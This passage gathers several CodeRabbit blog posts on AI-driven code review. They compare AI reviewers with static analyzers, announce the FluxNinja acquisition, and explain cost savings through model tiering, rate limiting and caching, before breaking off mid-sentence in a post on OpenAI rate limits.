efficiently spots syntactic errors and standard violations. Unlike [AI code reviewers](https://docs.coderabbit.ai/blog/ai-code-reviews-reclaims/) that provide context-aware feedback, SonarQube strictly adheres to predefined rules, making it highly effective for ensuring code meets specific coding standards and guidelines. The difference in approach underscores the fundamental operational distinction between SCAs and AI-driven code reviewers. ![](https://framerusercontent.com/images/uy5yxoDUmRkhveLVsCkW9sMVnHc.png) SonarQube excels with its wide-ranging integration with various IDEs and CI/CD pipelines, making it a versatile choice for teams aiming to maintain code quality. It goes beyond identifying errors, offering deep insights into your codebase’s health, and provides clear guidance for enhancing code efficiency and strength. ## Exploring AI code reviewers The world of code review is getting a major upgrade thanks to AI. AI code reviewers are more than just tools; they're changing how developers approach and improve coding. Unlike their static counterparts, these dynamic tools understand the context within which code is written, making their insights incredibly valuable for developers. Developers that employ AI code reviewers enjoy three important advantages over traditional code analysis: * **Adaptation:** Every piece of code they analyze makes them more efficient at spotting errors, suggesting fixes, and even predicting future issues. Their learning ability is a huge plus, especially in fast-paced development where quick and continual improvements are key. * **Speed:** AI code reviewers offer feedback in real-time, which means developers can tweak and improve their code on the fly. Instant feedback is a big deal in modern development practices, where things move quickly and updates are constant. * **Versatility:** Developers often work with several languages. AI code reviewers are able to handle several, making them a perfect fit for diverse development teams. Plus, they slide right into existing workflows, improving efficiency without turning everything upside down. AI code reviewers' ability to continuously learn and adapt enables developers to identify evolving coding trends and best practices. As a result, they’re shaping the future of programming languages and techniques. Ultimately, developers recognize AI reviewers as key catalysts for the next evolution in software development, a significant shift that promises to reshape the industry's future. ## AI code reviewer example: CodeRabbit [CodeRabbit](https://coderabbit.ai/) stands out as an innovative AI-driven code review tool designed to enhance development speed and code quality. The company claims its innovation emerged from their dissatisfaction with traditional code review methods. Here's what makes CodeRabbit unique: * **Line-by-line code change suggestions:** It scrutinizes each line of code changes, offering actionable suggestions that developers can directly commit via the GitHub interface. * **Continuous, incremental reviews:** Unlike traditional methods that review the entire pull request at once, our tool continuously evaluates each new commit. * **Cost-effectiveness with reduced noise:** The tool's focus on incremental reviews minimizes distractions by tracking only the changes made since the last commit, relative to the base of the pull request. * **Interactive chat feature:** Users can converse with the AI about specific lines of code or entire files, facilitating contextual understanding, test case generation, and complexity reduction. * **Smart review skipping:** The tool intelligently omits in-depth reviews for simpler changes, such as typo corrections, or when the overall changes appear satisfactory. As a code reviewer, CodeRabbit is complementary to code generators. Unlike other code reviewers, CodeRabbit provides a comprehensive, context-driven review of the code. Designed with AI as the core focus, its base prompts are open-source. ## Comparative analysis: Accuracy and efficiency AI code reviewers and SCAs are very different tools with their own strengths and weaknesses. Two areas to pay attention to are accuracy and efficiency in pinpointing errors and improving code quality. SCAs excel at pinpointing syntactic errors and standard violations. They rely on predefined rules so their accuracy is high for specific, rule-based issues. The flip side to this is that they’re likely to miss complex, context-specific bugs. AI code reviewers fill in the gap here. They go beyond syntax to help you understand the context and logic of the code. In addition to identifying basic errors, they also reveal deeper logical and structural issues, leading to more comprehensive error detection. They even learn over time, continuously improving their ability to detect a wider range of errors and adapt to the evolving complexities of coding projects. In terms of efficiency, SCAs are quick to scan code for rule-based errors, providing immediate feedback. However, their efficiency can take a hit when dealing with complex, nuanced issues that go beyond their rule set. They may even slow down the review process, as developers might need to spend additional time interpreting and resolving these complex issues that the analyzer couldn't fully address. AI code reviewers are thorough and swift. They can review large volumes of code quickly, understanding context and offering relevant suggestions. As AI code reviewers become more advanced, they might reduce the reliance on SCAs, giving devs more time for strategic tasks, enhancing overall productivity. While SCAs are dependable for straightforward, rule-based error detection, AI code reviewers offer a broader, more nuanced analysis. They bring efficiency and depth to the code review process, making them a powerful asset in modern software development. ## Choosing the right tool for your needs Choosing the right tool between SCAs and AI code reviewers boils down to understanding what your project really needs, what your team can handle, and where you're heading in the long run. Let's dive into some key factors to mull over and some pointers for different development scenarios: * **Project complexity and size**: For small projects or startups with limited resources, an SCA is often sufficient. It provides basic error detection and code quality checks without a significant investment. Larger, more complex projects might benefit more from an AI code reviewer. The advanced capabilities of AI tools in understanding context and logic helps maintain code quality at scale. * **Team expertise and learning curve:** For teams new to coding or less experienced, SCAs are an ideal starting point. They offer clear feedback on syntax and style, aiding in learning and maintaining coding standards. Conversely, teams with more experience may benefit more from AI code reviewers. They provide deeper insights and handle complex code structures effectively, suitable for teams adept at managing advanced feedback and suggestions. * **Budget and resource availability:** Cost-conscious projects with tight budgets should lean towards SCAs for their affordability and ease of integration. If the budget allows for a more substantial investment in long-term efficiency and code quality, AI code reviewers are the way to go. The initial higher costs are often justified by the time savings and advanced analysis they bring. * **Integration and workflow:** Consider how well the tool integrates with your existing development workflow. SCAs are typically easier to integrate and use with fewer changes to the current workflow. AI code reviewers, while possibly requiring more integration effort, offer a more seamless code review process once set up, especially in advanced development environments. * **Long-term development goals:** For ongoing projects with evolving codebases, AI code reviewers can be a strategic investment, providing ongoing learning and adaptation to new patterns and practices. SCAs are more suited for projects with a stable codebase and well-defined coding standards, where major changes in technologies or practices are not expected. In the end, picking between SCAs and AI code reviewers comes down to your team's expertise, the intricacy of your project, how much you can spend, and your long-term goals. If you've got a smaller project or are just getting started, you might lean towards the clear-cut, rule-focused style of SCAs. But for larger, evolving projects, the deeper, adaptive insights from AI code reviewers could be the way to go. With our AI-first approach, we harness the full potential of artificial intelligence to streamline and enhance coding practices. Join us as we push the limits of AI in coding, and see how [CodeRabbit](https://coderabbit.ai/) can transform your development process.

FluxNinja joins CodeRabbit

Aravind Putrevu — Sat, 16 Mar 2024 00:00:00 GMT

We are excited to announce that CodeRabbit has acquired [FluxNinja](https://www.fluxninja.com/), a startup that provides a platform for building scalable generative AI applications. This acquisition will allow us to ship new use cases at an industrial-pace while sustaining our rapidly growing user base. FluxNinja's Aperture product provides advanced rate & concurrency limiting, caching, and request prioritization capabilities that are essential for reliable and cost-effective AI workflows. Since our launch, [Aperture's open-source](https://github.com/fluxninja/aperture) core engine has been critical to our infrastructure. Our initial use case centered around [mitigating aggressive rate limits](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits) imposed by OpenAI, allowing us to prioritize paid and real-time chat users during peak load hours while queuing requests from the free users. Further, we used Aperture's [caching and rate-limiting capabilities](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application) to manage costs that in turn allowed us to offer open-source developers a fully featured free tier by minimizing abuse. These capabilities allowed us to scale our user base without ever putting up a waitlist and at a price point that is sustainable for us. With Aperture's help, CodeRabbit has scaled to over 100K repositories and several thousand organizations under its review in a short period. We started CodeRabbit with a vision to build an AI-first developer tooling company from the ground up. Building enterprise-ready applied AI tech is unlike any other software engineering challenge of the past. Based on our learnings while building complex workflows, it became apparent that we need to invest in a platform that can solve the following problems: * **Prompt rendering:** Prompt design and rendering is akin to responsive web design. Web servers render pages based on the screen size and other parameters, for example, on a mobile device, navigation bars are usually rendered as hamburger menus, making it easier for human consumption. Similarly, we need a prompt server that can render prompts based on the context windows of underlying models and prioritize the packing of context based on business attributes, making it easier for AI consumption. It's not feasible to include the entire repository, past conversations, documentation, learnings, etc. in a single code review prompt because of the context window size limitations. Even if it was possible, AI models exhibit poor recall when doing an inference on a completely packed context window. While tight packing may be acceptable for use cases like chat, it’s not for use cases like code reviews that require accurate inferences. Therefore, it's critical to render prompts in such a way that the quality of inference is high for each use-case, while being cost-effective and fast. In addition to packing logic, basic guardrails are also needed, especially when rendering prompts based on inputs from end-users. Since we provide a free service to public repositories, we have to ensure that our product is not misused beyond its intended purpose or tricked into divulging sensitive information, which could include our base prompts. * **Validation & quality checks:** Generative AI models consume text and output text. On the other hand, traditional code and APIs required structured data. Therefore, the prompt service needs to expose a RESTful or gRPC API that can be consumed by the other services in the workflow. We touched upon the rendering of prompts based on structured requests in the previous point, but the prompt service also needs to parse, validate responses into structured data and measure the quality of the inference. This is a non-trivial problem, and multiple tries are often required to ensure that the response is thorough and meets the quality bar. For instance, we found that when we pack multiple files in a single code review prompt, AI models often miss hunks within a file or miss files altogether, leading to incomplete reviews. * **Observability:** One key challenge with generative AI and prompting is that it's inherently non-deterministic. The same prompt can result in vastly different outputs, which can be frustrating, but this is precisely what makes AI systems powerful in the first place. Even slight variations in the prompt can result in vastly inferior or noisy outputs, leading to a decline in user engagement. At the same time, the underlying AI models are ever-evolving, and the established prompts drift over time as the models get regular updates. Traditional observability is of little use here, and we need to rethink how we classify and track generated output and measure quality. Again, this is a problem that we have to solve in-house. While FluxNinja's Aperture project was limited to solving a different problem around load management and reliability, we found that the underlying technology and the team's expertise were a perfect foundation for building the AI platform. Prompt engineering is in its nascent stage but is emerging as a joystick for controlling AI behavior. Packing the context window with relevant documents (retrieval augmented generation, aka RAG) is also emerging as the preferred way of providing proprietary data compared to fine-tuning the model. Most AI labs focus on increasing the context window rather than making fine-tuning easier or cheaper. Despite the emergence of these clear trends, applied AI systems are still in their infancy. None of the recent AI vendors seem to be building the "right" platform, as most of their focus has been on background/durable execution frameworks, model routing proxies/gateways, composable RAG pipelines, and so on. Most of these approaches fall short of what a real-world AI workflow requires. The right abstractions and best practices will still have to appear, and the practitioners themselves will have to build them. AI platforms will be a differentiator for AI-first companies, and we are excited to tackle this problem head-on with a systems engineering mindset. We are excited to have the FluxNinja team on board and to bring our users the best-in-class AI workflows. We are also happy to welcome [Harjot Gill](https://www.linkedin.com/in/harjotsgill/), the founder of FluxNinja, and the rest of the team to CodeRabbit.

Modern AI stack for developer productivity

Aravind Putrevu — Fri, 05 Jan 2024 00:00:00 GMT

The 'modern AI stack for developer productivity' refers to a comprehensive set of AI-powered developer tools that improve developer productivity in building software. In 2023, Large Language Models (LLMs) caused significant disruption, leading to a rapid increase in the adoption of artificial intelligence within the development lifecycle, particularly in the realm of 'developer productivity tools'. A significant majority of software development projects are now leveraging some form of AI, specifically Generative AI, to transform traditional development workflows into more intelligent, efficient, and automated processes. The modern AI stack for developer productivity is reshaping the landscape of software development, making once time-consuming tasks or complex more manageable and automated. From helping with the research or code writing to reviewing code and ensuring quality, the modern AI stack is a testament to how AI is not just an add-on but an integral component in the software development process. Are you leveraging the full potential of the modern AI tech stack in your projects? This article might help you to get that perspective needed to understand how it might elevate your work to the next level. ## Three Pillars of the Modern AI Stack for Developer Productivity [](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#three-pillars-of-the-modern-ai-stack-for-developer-productivity) There are three key components in the modern AI stack for developer productivity that are useful in different stages of the development lifecycle. These three stages are the research or knowledge gathering stage, the coding stage, and the final code review stage. Let’s discuss each of these stages in detail and how AI tools can help improve developer productivity in each. ### Knowledge[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#knowledge) The Knowledge pillar is central to the modern AI stack. It involves AI systems helping developers gather and synthesize knowledge, usually in the form of a chat or question-and-answer session. A prime example in this space is [ChatGPT](https://chat.openai.com/) * [ChatGPT](https://chat.openai.com/) is the leading AI assistant to quickly answer developers' questions on syntax, frameworks, debugging, etc. * It acts like a supercharged search engine, saving developers time from having to dig through documentation or StackOverflow. * ChatGPT can also explain concepts, provide code examples and suggestions, and identify knowledge gaps. Over time, these models will get better at technical reasoning with more training data. * [StackOverflow Community Search](https://stackoverflow.co/labs/search/) is another product in this category which instantly summarizes the solution. This transformation is crucial in developing environments where quick access to information and rapid problem-solving are essential. #### Challenges[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#challenges) One of the main challenges is ensuring the accuracy and reliability of the answers. AI systems might sometimes generate plausible but incorrect or biased responses. ### Code Generation[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#code-generation) Code generation through AI marks a significant leap in software development. AI models, trained on vast code repositories, can now assist in generating code snippets and at times the entire modules. This accelerates the coding process. The evolution of this pillar is a testament to AI's growing understanding of programming languages and logic, offering a collaborative tool that augments the developer's capabilities rather than replacing them. * AI models like OpenAI’s GPT-4 Code Interpreter are leading this segment. * They aid in writing code, offering suggestions, and even generating entire code blocks based on user input. * They are particularly beneficial in increasing development speed and making coding more accessible to non-experts. * [GitHub Copilot](https://github.com/features/copilot) introduces this experience in the IDE (such as VS Code) where you code. It enhances coding efficiency by rapidly suggesting code blocks and functions directly within the editor. This helps developers generate boilerplate code, complete repetitive tasks and implement common patterns much faster. #### Challenges[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#challenges-1) The limitations include dependency on the training data, which may not always represent the most efficient or modern coding practices. Ethically, there are concerns about code originality and the potential for inadvertently generating vulnerable or buggy code. ### Code Review[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#code-review) AI’s role in code review is about ensuring quality, compliance, and optimization. Unlike traditional code reviews, which are time-consuming and prone to human oversight, AI-driven code reviews are swift and more thorough. AI models can scan code for patterns, anomalies, and compliance with coding standards, offering insights and suggestions for improvements. This pillar has evolved from basic syntax checking to sophisticated analysis, significantly enhancing the code quality. * Automated code review tools, like [CodeRabbit](https://coderabbit.ai/), help in identifying bugs, evaluating whether the PR achieves its objectives, and ensuring adherence to coding standards. The in-line comments make it easier to use and put things in motion. * These tools can analyze code more thoroughly and quickly than human reviewers, leading to higher quality software. This frees up developer time as well as improves code quality before reaching production. * Over time, CodeRabbit could fine-tune to a team's specific code review checklist and feedback provided in comments to provide even more accurate suggestions and extend this access to organization knowledge via code reviews naturally. #### Challenges[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#challenges-2) If there is not enough information about the requirements in the issues, the PR assessment against the requirement might not provide the accurate picture as you would expect. ## Prioritize knowledge and review over generation[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#prioritize-knowledge-and-review-over-generation) While most people would be attracted by the promises code generation offers, I believe it will not have as big an impact on developer productivity as the other two - Knowledge and Code Review. Code Generation tools may save some time in writing standard code, understanding and fine-tuning the output remains crucial. But the risk of overreliance on AI for code generation can lead to code inaccuracies and legal issues with AI-generated code. The real productivity gains come from improving organizational knowledge and code review process to ensure high standards of code quality. As [StackOverflow rightly mentioned](https://stackoverflow.blog/2023/12/29/the-hardest-part-of-building-software-is-not-coding-its-requirements/) **|** *The hardest part of building software is not coding, it is requirements* Software is more than just code; it's about meeting the users' need. The knowledge and code review pillar tightly align with this goal. Which is why I urge you to prioritize Knowledge and Code Review tools in your modern AI stack. ## Conclusion[](https://blog.coderabbit.ai/blog/modern-ai-stack-for-developer-productivity#conclusion) The integration of these three pillars - Knowledge, Code Generation, and Code Review - forms a robust foundation in the AI-driven development process. Each pillar complements the others, creating a synergistic environment where developers are empowered with advanced tools and insights, leading to more efficient, innovative, and error-free software development.

How we built a cost-effective Generative AI application

Aravind Putrevu — Fri, 22 Dec 2023 00:00:00 GMT

Since its inception, CodeRabbit has experienced steady growth in its user base, comprising developers and organizations. Installed on thousands of repositories, CodeRabbit reviews several thousand pull requests (PRs) daily. We have [previously discussed](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits) our use of an innovative client-side request prioritization technique to navigate OpenAI rate limits. In this blog post, we will explore how we manage to deliver continuous, in-depth code analysis cost-effectively, while also providing a robust, free plan to open-source projects. ## CodeRabbit's Product Offering and LLM Consumption[](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application#coderabbits-product-offering-and-llm-consumption) CodeRabbit is an AI-first PR Review tool that uses GPT APIs for various functionalities. CodeRabbit offers the following tiers of service: * **CodeRabbit Pro:** A paid service providing in-depth code reviews for private repositories. It's priced according to the number of developers, starting with a full-featured 7-day free trial. * **CodeRabbit for Open Source:** A free service offering in-depth code reviews for open source (public) repositories. * **CodeRabbit Free:** A free plan for private repositories, providing summarization of code changes in a PR. Our vision is to offer an affordable, AI-driven code review service to developers and organizations of all sizes while supporting the open-source community. We are particularly mindful of open-source projects, understanding the challenges in reviewing community contributions. Our goal is to reduce the burden of code reviews for open-source maintainers by improving submission quality before the review process begins. CodeRabbit's review process is automatically triggered when a PR is opened in GitHub or GitLab. Each review involves a complex workflow that builds context and reviews each file using large language models (LLMs). Code review is a complex task that requires an in-depth understanding of the changes and the existing codebase. High-quality review comments necessitate state-of-the-art language models such as gpt-4. However, these models are significantly more expensive than simpler models, as shown by the [10x-30x price difference](https://openai.com/pricing) between gpt-3.5-turbo and gpt-4 models. ![](https://framerusercontent.com/images/y2qM0vieM6oWHGW7iILbR8rbQ.png) gpt-4 model is 10-30x more expensive than gpt-3.5-turbo model Our primary cost driver is using OpenAI's API to generate code review comments. We will share our cost optimization strategies in the following sections. Without these optimizations, our free offering to open-source projects would not be feasible. Let's take a look at the strategies that helped us optimize the cost and improve user experience. ## 1\. Dual-models: Summarize & Triage Using Simpler Models[](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application#1-dual-models-summarize--triage-using-simpler-models) For less complex tasks such as summarizing code diffs, simpler models such as gpt-3.5-turbo are adequate. As an initial optimization, we use a mix of models, as detailed in [our earlier blog post](https://blog.coderabbit.ai/blog/coderabbit-deep-dive). We use gpt-3.5-turbo to compress large code diffs into concise summaries, which are then processed by gpt-4 for reviewing each file. This dual-model approach significantly reduces costs and enhances review quality, enabling us to manage PRs with numerous files and extensive code differences. Additionally, we implemented triage logic to skip trivial changes from the review process. We use the simpler model to classify each diff as either trivial or complex, as part of the same prompt used for code diff summarization. Low-risk changes such as documentation updates, variable renames, and so on, are thus excluded from the thorough review process. This strategy has proven effective, as simpler models can accurately identify trivial changes. By using this dual-model approach for summarization and filtering out trivial changes, we save almost 50% on costs. ## 2\. Rate-limiting: Enforcing Fair Usage[](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application#2-rate-limiting-enforcing-fair-usage) Upon launching our free service for open-source projects, we noticed individual developers using it as a coding co-pilot by making hundreds of incremental commits for continuous feedback. CodeRabbit, designed for thorough code reviews unlike tools such as GitHub Copilot, incurs high costs when used in this manner. Therefore, we implemented hourly rate-limits on the number of files and commits reviewed per user, to control excessive usage without compromising user experience. These limits vary across different product tiers. For example, we set more aggressive limits for open-source users compared to trial and paid users. To implement these rate-limits, we evaluated various options for Serverless environments. We opted for [FluxNinja Aperture](https://fluxninja.com/) for its simplicity and policy sophistication. We were already using Aperture for managing [OpenAI rate limits](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits), making it a natural choice for our rate-limiting needs as well. In FluxNinja Aperture, policies are decoupled from application logic through labels, enabling new policy additions without altering application code. We apply labels in FluxNinja Aperture, wrap the review workload with its SDK, and write policies that enforce limits on those labels. For example, we enforce a 3 reviews per hour limit (1 review every 20 minutes) for open-source users, allowing a burst of 2 back-to-back reviews, as shown in the screenshots below. ![](https://framerusercontent.com/images/1etMQYd13gki6CPITdyj6YXBPI.png) Integration with FluxNinja Aperture SDK *Rate-limiting commits per hour for open-source users* ![](https://framerusercontent.com/images/itoaYJdM5RE6at6nxflhZKd88mk.png) *Wait time feedback to the user in a comment* Given the high cost and capacity constraints of state-of-the-art models such as gpt-4, rate-limiting is an essential requirement for any AI application. By implementing fair-usage rate limits, we are saving almost 20% on our costs. ![](https://framerusercontent.com/images/ncC7v5MVxXsKGAOezXEVyd7SJbM.png) *Rate limit metrics for open-source users* ## 3\. Caching: Avoid Re-generating Similar Review Comments[](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application#3-caching-avoid-re-generating-similar-review-comments) We believe that building user habits around AI involves seamlessly augmenting existing workflows. Therefore, AI code reviews must be continuous: they should trigger as soon as a PR is opened and incrementally update the summary and generate review comments as more commits are added. However, this approach can become expensive and generate repetitive feedback, as similar review comments are re-generated for each commit. We observed that most incremental commits involve minor adjustments or bug fixes in the initial implementation. To address this, we implemented a caching layer to avoid re-generating similar review comments for incremental commits. Fortunately, Aperture also provides a simple caching mechanism for summaries from previous commits, using the same API call where we implemented rate limits. During each incremental review, we use the simpler model for a semantic comparison of the code changes described in both summaries. If the changes are similar, we skip the review for those files to prevent re-generating similar review comments. This method differs from vector similarity-based caching techniques, as we use an LLM model for comparing summaries. Vector similarity-based approaches wouldn't be effective in our case, as the summaries require semantic comparison. We have integrated this method into the same prompt used for code diff summarization and triage. By using the more cost-effective gpt-3.5-turbo model as an advanced similarity filter before invoking the more expensive gpt-4 model for the same file, we have saved almost 20% of our costs by avoiding the generation of similar review comments. ## Conclusion[](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application#conclusion) In this blog post, we briefly discussed how state-of-the-art LLMs such as gpt-4 can be expensive in production. We also shared our strategy of using a combination of simpler models, rate limits, and caching to optimize operational costs. We hope our experiences can assist other AI startups in optimizing their costs and developing cost-effective AI applications.

Boosting Engineering Efficiency Using AI Code Reviews for Remote Teams

Aravind Putrevu — Sun, 12 Nov 2023 00:00:00 GMT

## Introduction[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#introduction) Welcome to the future, where a morning commute involves going from bed to home office. The dress code is "business on top, pajamas down below." In this new world of remote work, tech teams worldwide are getting good at video calls and wishing for strong Wi-Fi like strong coffee. But here's the question: How do we maintain engineering efficiency when Joe from frontend is in Mexico, and DevOps Dave just started his day in Dublin? This setup presents a unique challenge: ensuring that code reviews, which are essential for code quality, are consistent, timely, and efficient. Have you ever missed a code review because it was late at night? We've all been there. Are you waiting for days to get feedback because your reviewer is in a different time zone? Oh, the frustration! Introducing the helpful algorithm: AI-driven code reviews. They're like a reliable friend who never sleeps (because they're code) and knows all the coding rules. This article explores how these intelligent bots fill the gaps in our fast-paced, sometimes slow, new world. ## Direct Correlation: Remote Engineering Challenges & AI Solutions[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#direct-correlation-remote-engineering-challenges--ai-solutions) Remember the [g](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion)ood old days when you could easily ask a quick question to a colleague by just going to their desk? Those days are gone, just like floppy disks and dial-up internet. Nowadays, with remote work, we have traded cubicles for couches and water cooler chats for solo trips to the fridge. Let's address the three significant challenges of remote engineering and explore how AI's modern technology can provide a solution. **Communication Gaps:** We've all sent that "quick query" across the ocean and received a response when the moon's high in our sky. Time zones, while fantastic for the travel and holiday industry, can be the bane of a remote engineer's existence. The lag between question and answer and the lack of in-person interaction can make collaborating feel like you're screaming into a digital void. * **AI Solution:** AI doesn't need sleep (lucky them). They're the 24/7 store of the coding world, always open and ready to assist. Offering real-time feedback, irrespective of whether it's midday in Mumbai or twilight in Toronto, AI ensures that time zones remain a challenge only for your travel plans. * **Delayed Reviews & Feedback Loops:** Here's a familiar scenario: You push code, sit back, and wait. And wait. And wait, some more. Your code is in the ether, waiting for a review that's as elusive as a unicorn. The elongated feedback loops in remote settings can sometimes feel like a seemingly endless game of ping pong, where the ball... disappears. * **AI Solution:** Fancy a game-changer? AI provides immediate feedback. With algorithms working at the speed of computers, the waiting game is dramatically reduced. You push, AI reviews, and voilà! Feedback's ready, hotter than a freshly brewed espresso. * **Code Consistency & Quality:** Have you ever noticed how everyone's homemade bread looks and tastes slightly different? The same goes for code written by engineers scattered across various locales. Influenced by unique experiences and environments, each individual brings slight variances in coding style and approach. * **AI Solution:** Call AI the master baker, consistently churning out the perfect loaf every time. AI-driven code review tools maintain a unified standard, ensuring that whether it's Peter in Paris or Lila in Lagos, the quality and consistency of code remain top-notch. ## Real-World Applications & Pitfalls[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#real-world-applications--pitfalls) In a world where data is king, we enjoy hearing success stories (especially when they include pie charts!). However, there are challenges to overcome when it comes to incorporating AI code reviews in a remote environment. Let's explore the real-life stories of AI experts and the significant obstacles they have overcome. ### Common Pitfal[l](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion)s & Solutions[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#common-pitfalls--solutions) **Over-reliance on AI:** Just as one wouldn't ask a Roomba to do a deep spring-cleaning, leaning too much on AI for code reviews can miss out on the nuanced human touch. Solution: Tech Titans Inc. struck a balance by using AI for preliminary checks and human eyes for final reviews, ensuring that the code was technically sound and made logical sense in the grander scheme. **Resistance to Change:** Implementing new tools often meets resistance, especially if developers feel their expertise is being questioned. Startup Sensations Ltd. faced a mini rebellion of sorts. Solution: They organized workshops emphasizing AI as a tool to aid, not replace. Showcasing its strengths and limitations bridged the trust gap, smoothing the integration. **Misunderstand**[**i**](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion)**ng AI Feedback:** Sometimes, AI can flag something as an error, even if it's a deliberate choice by the coder. This can lead to confusion and wasted effort trying to "fix" what isn't broken. Solution: Both companies implemented clear guidelines on understanding and acting upon AI feedback, ensuring developers knew when to consider and contest. ## Actionable Takeaways[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#actionable-takeaways) Navigating th[e](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion) intricate maze of code reviewing can be daunting. But fret not! There are some practical steps and considerations to help steer the ship. And speaking of guiding lights, let's first mention a noteworthy tool that's caught the industry's attention. ### CodeRabbit – An AI Code Reviewer[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#coderabbit--an-ai-code-reviewer) Heard of CodeRabbit? It's this nifty AI tool that's gaining traction. Without all the bells and whistles – it simply reviews your code once pull requests are made. It's a straightforward, no-fuss tool designed to streamline the review process, especially for remote teams. ### Steps for Effective Integration and Adoption[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#steps-for-effective-integration-and-adoption) 1. **Orientation:** [I](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion)t's crucial to acquaint your team with any new tool. With something like CodeRabbit, a simple hands-on session or tutorial might suffice. 2. **Pilot Testing**[**:**](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion) Test the waters first. Let's start with one project or a subset of your team to gauge the tool's efficiency and user-friendliness. 3. **Constructive** [**F**](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion)**eedback:** Encourage an open line of communication. Ensure your team provides feedback about the tool's strengths and areas needing tweaks. ### Balancing AI Assistance with Human Touch[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#balancing-ai-assistance-with-human-touch) No matter how advanced our tools get, there's an underlying essence of human insight that can't be entirely replicated. To ensure the balance: 1. **Sequential Reviews:** Let AI, like CodeRabbit, serve as the preliminary filter. The team should do subsequent, deeper reviews to capture nuances. 2. **Regular Updates:** Keep the AI tool informed. Feedback from human reviewers refines its algorithm, making it more intuitive with time. 3. **Encourage Team Discussions:** After automated reviews, foster team discussions. This ensures the code isn't just machine-compliant, but also logically sound and efficient from a human perspective. ## Conclusion[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion) Ah, the outcome! We've ventured deep into the rabbit hole (no pun intended with CodeRabbit) of AI's transformative role in remote engineering. From the highs of streamlined code reviews to the essential human-AI harmony, it's evident that AI doesn't just knock on the doors of modern engineering—it's barging in, holding a battering ram of innovation. Remember when remote work was a cute little option, often tucked away in the "benefits" section of a job posting? Well, it's not just mainstream now; it's the modus operandi for countless teams globally. As this mode of work continues to snowball, the technological advancements, especially ones like AI-driven code reviewers, aren't merely luxury add-ons. They are becoming vital cogs in the well-oiled machine that a remote engineering team aspires to be. As we stand on the brink of yet more seismic shifts in the way we work and collaborate, it's exhilarating to think of the untapped potential of tools and technologies still on the horizon. The canvas of remote work is vast, and we've only just started splashing it with color. Here's to a brighter, more innovative, and yes, more automated future, but always with a sprinkle of irreplaceable human magic. ***Cheers to the*** ***codes that bind us, both human and binary.***

Squeezing Water from Stone - Managing OpenAI Rate Limits with Request Prioritization

Aravind Putrevu — Sun, 22 Oct 2023 00:00:00 GMT

Since CodeRabbit launched a couple of months ago, it has received an enthusiastic response and hundreds of sign-ups. CodeRabbit has been installed in over 1300 GitHub organizations and typically reviews more than 2000 pull requests per day. Furthermore, the usage continues to flourish; we are experiencing a healthy week-over-week growth.... While this rapid growth is encouraging, we've encountered challenges with OpenAI's stringent rate limits, particularly for the newer `gpt-4` model that powers CodeRabbit. In this blog post, we will delve into the details of OpenAI rate limits and explain how we leveraged the [FluxNinja's Aperture](https://www.fluxninja.com/) load management platform to ensure a reliable experience as we continue to grow our user base. ## Understanding OpenAI rate limits[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#understanding-openai-rate-limits) OpenAI imposes [fine-grained rate limits](https://platform.openai.com/docs/guides/rate-limits/overview) on both requests per minute and tokens per minute for each AI model they offer. In our account, for example, we are allocated the following rate limits: ![](https://framerusercontent.com/images/WCNgIwtyOdTtC8iOFvbU3axD8.png) We believe that the rate limits are in place for several reasons and are unlikely to change in the near future: * Advanced models such as `gpt-4` are computationally intensive. Each request can take several seconds or even minutes to process. For example, 30s response time is fairly typical for complex tasks. OpenAI sets these limits to manage aggregate load on their infrastructure and provide fair access to users. * The demand for AI has outstripped the supply of available hardware, particularly the GPUs required to run these models. It will take some time for the industry to meet this exploding demand. ## CodeRabbit's OpenAI usage pattern and challenges[](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits#coderabbits-openai-usage-pattern-and-challenges) CodeRabbit is an AI-driven code review application that integrates with GitHub or GitLab repositories. It analyzes pull requests and provides feedback to the developers on the quality of their code. The feedback is provided in the form of comments on the pull request, allowing the developers to enhance the code based on the provided suggestions in the follow-up commits. ![](https://framerusercontent.com/images/Y83rpWAtskEjGPenr3dNOUm6mY.png) CodeRabbit employs a combination of the `gpt-3.5-turbo` and `gpt-4` family of models. For simpler tasks such as summarization, we use the more economical `gpt-3.5-turbo` model, whereas intricate tasks such as in-depth code reviews are performed by the slow and expensive `gpt-4` model. Our usage pattern is such that each file in a [pull request is summarized and reviewed concurrently](https://coderabbit.ai/blog/coderabbit-deep-dive). During peak hours or when dealing with large pull requests (consisting of 50+ files), we began to encounter `429 Too Many Requests` errors from OpenAI. Even though, we had a retry and back-off mechanism, many requests were still timing out after multiple attempts. Our repeated requests to OpenAI to increase our rate limits were met with no success. To mitigate these challenges, we cobbled together 